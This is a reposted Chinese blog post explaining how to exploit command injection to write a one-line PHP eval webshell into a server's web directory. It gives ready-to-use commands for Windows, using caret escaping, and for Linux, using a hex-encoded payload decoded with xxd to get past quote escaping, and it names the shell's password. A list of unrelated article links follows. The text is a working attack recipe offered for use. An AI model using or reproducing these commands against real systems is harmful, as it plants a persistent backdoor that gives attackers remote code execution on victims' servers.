博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
命令注入写webshell
阅读量:7097 次
发布时间:2019-06-28

本文共 361 字,大约阅读时间需要 1 分钟。

hot3.png

利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义,假设需要写入

<?php eval($_POST[pandas]); ?>,方法如下:

 

 

WINDOWS:用^转义<,即执行echo ^<?php eval($_POST[pandas]); ?^> > web可写目录

 

LINUX:linux下需要用\来转义<,不过很多php都默认开启gpc。先用16进制转换一句话再用xxd命令把16进制还原,命令如下:

echo 3c3f706870206576616c28245f504f53545b70616e6461735d293b203f3e|xxd -r -ps > web

上面密码: pandas

转载于:https://my.oschina.net/9199771/blog/856425

你可能感兴趣的文章
win2003域控主备(热备)搭建
查看>>
浪潮之巅读后感
查看>>
Mathematica 函数调用发生异常时停止计算
查看>>
Clenshaw–Curtis quadrature
查看>>
5.23会议记录
查看>>
ajax做分页
查看>>
CHIL-SQL-约束 (Constraints)
查看>>
好用的软件推荐
查看>>
python一般简介,安装
查看>>
数据库事务
查看>>
实验三ShellShock 攻击实验
查看>>
AOP简介
查看>>
用户登陆模块的后端实现
查看>>
网关协议学习:CGI、FastCGI、WSGI
查看>>
TCP连接建立与释放
查看>>
mariadb multi-source replication(mariadb多主复制)
查看>>
64位操作系统在DOSBox中进入debug的问题
查看>>
程序设计师真情忏悔录
查看>>
文摘《十四》
查看>>
HTTP 错误 401.1 - 未授权:登录失败
查看>>